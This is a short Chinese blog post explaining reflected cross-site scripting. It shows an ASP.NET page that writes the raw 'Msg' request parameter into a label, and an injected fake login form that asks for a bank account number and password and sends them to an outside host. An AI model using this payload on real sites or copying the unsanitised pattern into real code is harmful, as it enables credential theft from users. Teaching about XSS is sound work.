工作中点滴记录

永远保持学徒心态

  博客园 :: 首页 :: 博问 :: 闪存 :: 新随笔 :: 联系 :: 订阅 订阅 :: 管理 ::

XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。

源页面放一个标签,在后台Page_Load里面写this.textLabel.Text = Request["Msg"];

构建攻击,让攻击后把数据传递到目标页

构建代码如下:

Msg=<form action='http://www.shtarena.com' method='get'>银行账号:<input type='text' name='ID'/>密码:<input type='text' name='pwd'/><input type='submit' value='Login'/></form>

页面加载完毕后,执行Login

此时我们可以看到账户和密码传递到www.shtarena.com

posted on 2011-01-23 14:20  梦里故乡  阅读(333)  评论(0编辑  收藏  举报